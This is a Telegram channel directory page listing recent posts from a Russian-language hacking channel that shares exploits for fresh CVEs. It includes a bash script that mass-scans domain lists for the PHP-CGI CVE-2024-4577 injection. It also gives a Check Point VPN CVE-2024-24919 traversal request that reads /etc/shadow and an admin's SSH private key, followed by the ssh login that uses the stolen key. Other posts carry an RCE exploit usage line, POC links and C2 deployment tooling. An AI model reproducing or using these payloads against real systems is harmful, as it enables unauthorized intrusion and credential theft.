Qidiruv uchun matnni kiriting
Ilg‘or kanal qidiruvi

Психология: гармония души

Здесь вы найдете практические советы по психологии
img
reklama

Как бесплатно раскрутить канал

Новый способ от 0 до 8792 пдп.
img
reklama

Анализ закупов на автомате

Проверка трафика на ботность и накрутку всего за 1 мин
img
reklama

Proxy Bar

@proxy_bar
Kanal geosi va tili: Rossiya, Ruscha

Exploits, Hacking and Leaks
Чат группы - https://t.me/chat_proxy_bar
Связь с администрацией и реклама:
admin@proxy-bar.org
Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker

Связанные каналы
Kanal geosi va tili
Rossiya, Ruscha
Toifa
Dastur va ilovalar
Statistika
Kanal siznikimi? Tasdiqlash Kanal tarixi
Postlar filtri

Proxy Bar

7 Jun, 20:35

Telegram'da ochish Ulashish Shikoyat qilish
DDOS для самых маленьких

#pic
5.1k 1 129 62
Proxy Bar

7 Jun, 19:32

Telegram'da ochish Ulashish Shikoyat qilish
CVE-2024-4577 Argument Injection in PHP-CGI
ДОПОЛНЕНИЕ к предыдущему посту
BASH:
#!/bin/bash

# Function to check vulnerability for a domain
check_vulnerability() {
local domain=$1
local response=$(curl -s -X POST "${domain}/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" \
-H "User-Agent: curl/8.3.0" \
-H "Accept: */*" \
-H "Content-Length: 23" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Connection: keep-alive" \
--data "" \
--max-time 10)

if [[ $response == *"PHP Version"* ]]; then
echo "$domain: Vulnerable"
fi
}

# Main function to iterate over domains
main() {
local file=$1
while IFS= read -r domain || [ -n "$domain" ]; do
check_vulnerability "$domain"
done < "$file"
}

# Check if the file argument is provided
if [ "$#" -ne 1 ]; then
echo "Usage: $0 "
exit 1
fi

# Call the main function with the domain list file
main "$1"

*
Сохраняйте скрипт и по списку доменов:
./CVE-2024-4577_script.sh /path/to/domains-list

#php #xamp
5.1k 0 144 11
Proxy Bar

7 Jun, 11:14

Telegram'da ochish Ulashish Shikoyat qilish
CVE-2024-4577 Argument Injection in PHP-CGI
*
При разработке PHP упустил из виду функцию преобразования символов Best-Fit в Windows. Когда PHP-CGI работает на платформе Windows и использует определенные кодовые страницы (упрощенный китайский 936, традиционный китайский 950, японский 932 и т. д.), атакующий может создавать вредоносные запросы для обхода исправления CVE-2012-1823. Это позволяет им выполнять произвольный код PHP без необходимости аутентификации.
*
fofa link (610,604 хостов)

#php #xamp
5.6k 0 204 13
Proxy Bar

6 Jun, 19:00

Telegram'da ochish Ulashish Shikoyat qilish
CVE-2024-27348 RCE в Apache HugeGraph Server
*
Usage:
python3 CVE-2024-27348.py -t http://target.tld:8080 -c "command to execute"

*
POC exploit

#apache #rce
4.4k 0 51 10
Proxy Bar

6 Jun, 18:57

Telegram'da ochish Ulashish Shikoyat qilish
CVE-2024-27822 macOS PackageKit
*
LPE
*
Для версий:
macOS 14.5 Beta 1 (23F5049f) and older
macOS 13.6.6 (22G630) and older
macOS 12.7.4 (21H1123) and older
Any version of macOS 11 or older
*
writeUp
*
exploit

#macos #lpe
4.3k 0 42 5
Proxy Bar

6 Jun, 08:31

Telegram'da ochish Ulashish Shikoyat qilish
CVE-2024-36801 SemСms
*
sql injection для версии Semcms v 4.8
*
SQLi + POC
4.5k 0 38 9
Proxy Bar

5 Jun, 18:32

Telegram'da ochish Ulashish Shikoyat qilish
Вышел PagedOut
Июнь 2024
*
почитать PDF

#ezine #hacking #tricks #coding
4.6k 0 49 11
Proxy Bar

5 Jun, 14:11

Telegram'da ochish Ulashish Shikoyat qilish
Unlock Docker (Россия, Куба, Иран, Судан, Сирия, КимЧенЫновка)
*
BASH script
*
#dogger
5k 0 107 34
Proxy Bar

5 Jun, 11:47

Telegram'da ochish Ulashish Shikoyat qilish
CVE-2024-5326 WordPress
*
Post Grid Gutenberg и плагин PostX = 4.1.2
User Contributor включает регистрацию новых пользователей и устанавливает роль по умолчанию для новых пользователей — Администратор.
*
POC exploit

#wordpress #exploit
5.2k 0 91 24
Proxy Bar

4 Jun, 07:57

Telegram'da ochish Ulashish Shikoyat qilish
CVE-2024-21512 MySQL2
*
Дырка в библиотеке MySQL для Node.js
*
POC

#mysql
5.4k 0 115 17
Proxy Bar

1 Jun, 00:31

Telegram'da ochish Ulashish Shikoyat qilish
Доброй ночи.
Написал небольшую книжку\руководство для начинающих взломщиков Linux.
Сей труд навеян вечным вопросом "Подскажите с чего начать?".
На какую то уникальность не претендую, но надеюсь кому то окажется полезным.
За вычитку благодарю uberhahn
Ну и с первым днем лета и днем защиты детей )
Само руководство book.proxy-bar.org

#book #linux #hex
19.2k 5 980 126
Proxy Bar

31 May, 18:14

Telegram'da ochish Ulashish Shikoyat qilish
fuck yeah !
*
ansible-havoc
*
Bash cкрипты/ansible для развертывания Havoc на Linode и настройки и SSL
*
download

#C2 #ansible
6.8k 0 151 31
Proxy Bar

30 May, 14:42

Telegram'da ochish Ulashish Shikoyat qilish
CVE-2024-24919 Check Point Remote Access VPN 0-Day
Ну или так 👌
aCSHELL/../../../../../../../
home/admin/.ssh/id_rsa
*
ssh admin@Хостъ -i id_rsa

#shitPointVPN #0Day
9.9k 0 388 48
Proxy Bar

30 May, 11:23

Telegram'da ochish Ulashish Shikoyat qilish
CVE-2024-24919
*
Check Point Remote Access VPN 0-Day
*
FOFA link
*
POC:
POST /clients/MyCRL HTTP/1.1
Host:
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

#0day #checkpoint
10.3k 1 319 42
Proxy Bar

30 May, 08:22

Telegram'da ochish Ulashish Shikoyat qilish
RWX_MEMEORY_HUNT_AND_INJECTION_DV
*
OneDrive.exe + API-интерфейс = шелл-код (без выделения новой области памяти RWX)
*
link
5.8k 0 41 7
Proxy Bar

29 May, 14:09

Telegram'da ochish Ulashish Shikoyat qilish
CVE-2024-27842 + CVE-2023-40404 macOS
*
Сплоит позволяет выполнять код на уровне ядра
*
POC exploit (для CVE-2024-27842)
POC exploit (для CVE-2023-40404)

#macos
6.4k 0 94 19
Proxy Bar

27 May, 22:10

Telegram'da ochish Ulashish Shikoyat qilish
cve-2024-2961_cnext-exploits.zip
7.6Kb
CVE-2024-2961 - тихоходка 2
*
Переполнение буфера в glibc's iconv
*
Exploit + POC 👌

#yammy
7.9k 0 171 22
Proxy Bar

27 May, 17:16

Telegram'da ochish Ulashish Shikoyat qilish
CVE-2024-2961 - тихоходка
*
Помните месяц назад был кипишь, относительно того что нашли дырку в glibc.
Тогда многие хостеры еще напряглись. Но так как в широкий паблик ничего не уплыло, все успокоились.
А ресёрчеры не успокоились, слишком вкусно пахло перспективным сплоитом.
Ну так вот, на сцену вползает Iconv со своим RCE.
*
Сегодня вышел отличный WriteUp (первая часть из трёх), который раскрывает только часть потенциала дыры 2961
*
Читаем
Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine
8.7k 1 196 36
Proxy Bar

27 May, 11:14

Telegram'da ochish Ulashish Shikoyat qilish
Linux Kernel Teaching. Laboratory
*
Большой и годный сборник лекций и лабораторных работ по ядру Linux. Лекции посвящены теоретическому исследованию ядра Linux.
Лабораторки сделаны в стиле инструкций.
Будет полезно: админам, драйверописателям и руткитоварам
*
Link

#linux #kernel
6.6k 0 167 15
Proxy Bar

26 May, 07:54

Telegram'da ochish Ulashish Shikoyat qilish
Образовательные мультики по воскресеньям !
*
Едим сырник, пьем кофе, смотрим мультики
*
Как работает нашумевший бэкдор XZUtils SSHD.
#XZ #мультики
6.6k 0 63 33
20 ta oxirgi post ko‘rsatilgan.